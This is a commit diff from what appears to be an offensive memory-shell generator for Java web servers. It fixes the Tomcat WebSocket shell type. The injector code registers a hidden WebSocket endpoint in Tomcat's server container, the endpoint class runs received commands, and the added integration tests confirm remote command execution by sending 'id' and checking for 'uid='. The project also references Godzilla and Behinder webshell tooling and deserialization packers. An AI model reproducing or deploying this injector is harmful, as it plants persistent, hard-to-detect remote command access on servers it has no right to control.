fix: tomcat WebSocket shell not work (#25)

This commit is contained in:
ReaJason
2025-02-25 00:11:16 +08:00
parent 5b838adbe9
commit 85828f7975
5 changed files with 82 additions and 20 deletions
@@ -9,6 +9,7 @@ import com.reajason.javaweb.memshell.config.CommandConfig;
import com.reajason.javaweb.memshell.config.ShellConfig;
import net.bytebuddy.ByteBuddy;
import net.bytebuddy.dynamic.DynamicType;
import org.apache.commons.lang3.StringUtils;
import java.util.HashMap;
@@ -38,14 +39,17 @@ public class CommandGenerator {
builder = LogRemoveMethodVisitor.extend(builder);
}
if (config.getShellType().startsWith(ShellType.AGENT)) {
builder = builder.visit(
new LdcReAssignVisitorWrapper(new HashMap<Object, Object>(3) {{
put("paramName", shellConfig.getParamName());
}})
);
} else {
builder = builder.field(named("paramName")).value(shellConfig.getParamName());
String shellType = config.getShellType();
if (!ShellType.WEBSOCKET.equals(shellType)) {
if (StringUtils.startsWith(shellType, ShellType.AGENT)) {
builder = builder.visit(
new LdcReAssignVisitorWrapper(new HashMap<Object, Object>(1) {{
put("paramName", shellConfig.getParamName());
}})
);
} else {
builder = builder.field(named("paramName")).value(shellConfig.getParamName());
}
}
try (DynamicType.Unloaded<?> make = builder.make()) {
@@ -13,7 +13,9 @@ import okhttp3.HttpUrl;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.Response;
import org.junit.jupiter.api.Assumptions;
import org.java_websocket.client.WebSocketClient;
import org.java_websocket.handshake.ServerHandshake;
import org.junit.jupiter.api.Test;
import org.testcontainers.containers.GenericContainer;
import org.testcontainers.shaded.org.apache.commons.io.FileUtils;
import org.testcontainers.shaded.org.apache.commons.lang3.RandomStringUtils;
@@ -21,16 +23,18 @@ import org.testcontainers.shaded.org.apache.commons.lang3.StringUtils;
import org.testcontainers.utility.MountableFile;
import java.io.IOException;
import java.net.URI;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Objects;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;
import static org.hamcrest.CoreMatchers.anyOf;
import static org.hamcrest.CoreMatchers.containsString;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.junit.jupiter.api.Assertions.assertDoesNotThrow;
import static org.junit.jupiter.api.Assertions.assertTrue;
import static org.junit.jupiter.api.Assertions.*;
/**
* @author ReaJason
@@ -57,6 +61,12 @@ public class ShellAssertionTool {
shellUrl = url + urlPattern;
}
if (shellType.equals(ShellType.WEBSOCKET)) {
urlPattern = "/" + shellTool + shellType + packer.name();
URL url1 = new URL(url);
shellUrl = "ws://" + url1.getHost() + ":" + url1.getPort() + url1.getPath() + urlPattern;
}
GenerateResult generateResult = generate(urlPattern, server, shellType, shellTool, targetJdkVersion, packer);
String content = null;
@@ -87,7 +97,11 @@ public class ShellAssertionTool {
testGodzillaIsOk(shellUrl, ((GodzillaConfig) generateResult.getShellToolConfig()));
break;
case Command:
testCommandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig()));
if (shellType.equals(ShellType.WEBSOCKET)) {
testWebSocketCommandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig()));
} else {
testCommandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig()));
}
break;
case Behinder:
testBehinderIsOk(shellUrl, ((BehinderConfig) generateResult.getShellToolConfig()));
@@ -131,6 +145,50 @@ public class ShellAssertionTool {
}
}
@Test
void name() throws Exception {
testWebSocketCommandIsOk("ws://localhost:8082/app/hello", null);
}
public static void testWebSocketCommandIsOk(String entrypoint, CommandConfig shellConfig) throws Exception {
final CountDownLatch latch = new CountDownLatch(1);
final String[] responseHolder = new String[1];
final long timeout = 5;
WebSocketClient client = new WebSocketClient(new URI(entrypoint)) {
@Override
public void onOpen(ServerHandshake data) {
send("id");
}
@Override
public void onMessage(String message) {
responseHolder[0] = message;
latch.countDown();
close();
}
@Override
public void onClose(int code, String reason, boolean remote) {
}
@Override
public void onError(Exception ex) {
}
};
client.connect();
boolean connected = latch.await(timeout, TimeUnit.SECONDS);
if (!connected) {
fail("连接超时,未能成功连接到 WebSocket 服务器");
}
String res = responseHolder[0];
System.out.println(res);
assertTrue(res.contains("uid="));
}
public static void testBehinderIsOk(String entrypoint, BehinderConfig shellConfig) {
BehinderManager behinderManager = BehinderManager.builder()
.entrypoint(entrypoint).pass(shellConfig.getPass())
@@ -167,7 +225,7 @@ public class ShellAssertionTool {
.build();
ShellToolConfig shellToolConfig = null;
String uniqueName = shellTool + RandomStringUtils.randomAlphabetic(5)+ shellType + RandomStringUtils.randomAlphabetic(5)+ packer.name();
String uniqueName = shellTool + RandomStringUtils.randomAlphabetic(5) + shellType + RandomStringUtils.randomAlphabetic(5) + packer.name();
switch (shellTool) {
case Godzilla:
String godzillaPass = "pass";
@@ -1,10 +1,10 @@
package com.reajason.javaweb.integration.tomcat;
import com.reajason.javaweb.integration.TestCasesProvider;
import com.reajason.javaweb.memshell.ShellType;
import com.reajason.javaweb.memshell.Packers;
import com.reajason.javaweb.memshell.Server;
import com.reajason.javaweb.memshell.ShellTool;
import com.reajason.javaweb.memshell.Packers;
import com.reajason.javaweb.memshell.ShellType;
import lombok.extern.slf4j.Slf4j;
import net.bytebuddy.jar.asm.Opcodes;
import org.junit.jupiter.api.AfterAll;
@@ -23,7 +23,6 @@ import static com.reajason.javaweb.integration.ContainerTool.*;
import static com.reajason.javaweb.integration.DoesNotContainExceptionMatcher.doesNotContainException;
import static com.reajason.javaweb.integration.ShellAssertionTool.testShellInjectAssertOk;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.junit.jupiter.params.provider.Arguments.arguments;
/**
* @author ReaJason
@@ -44,7 +43,7 @@ public class Tomcat8ContainerTest {
static Stream<Arguments> casesProvider() {
Server server = Server.Tomcat;
Set<String> supportedShellTypes = Set.of(ShellType.FILTER, ShellType.LISTENER, ShellType.VALVE,
Set<String> supportedShellTypes = Set.of(ShellType.FILTER, ShellType.LISTENER, ShellType.VALVE, ShellType.WEBSOCKET,
ShellType.AGENT_FILTER_CHAIN, ShellType.CATALINA_AGENT_CONTEXT_VALVE);
Set<Packers> testPackers = Set.of(Packers.JSP, Packers.JSPX, Packers.JavaDeserialize);
return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers);
@@ -87,7 +87,7 @@ public class TomcatWebSocketInjector {
@SuppressWarnings("unchecked")
private void inject(Object context, Object obj) throws Exception {
private void inject(Object obj, Object context) throws Exception {
Object servletContext = invokeMethod(context, "getServletContext", null, null);
Object container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"javax.websocket.server.ServerContainer"});
if (container == null) {
@@ -103,9 +103,11 @@ public class TomcatWebSocketInjector {
Map<String, Object> o = (Map<String, Object>) getFieldValue(container, "configExactMatchMap");
if (o.containsKey(getUrlPattern())) {
System.out.println("websocket at " + getUrlPattern() + " already exists");
return;
}
invokeMethod(container, "addEndpoint", new Class[]{serverEndpointConfigClass}, new Object[]{endpointConfig});
System.out.println("websocket at " + getUrlPattern() + " inject successfully");
}
@SuppressWarnings("all")
@@ -14,7 +14,6 @@ import java.io.InputStream;
*/
public class CommandWebSocket extends Endpoint implements MessageHandler.Whole<String> {
public static String paramName;
private Session session;
@Override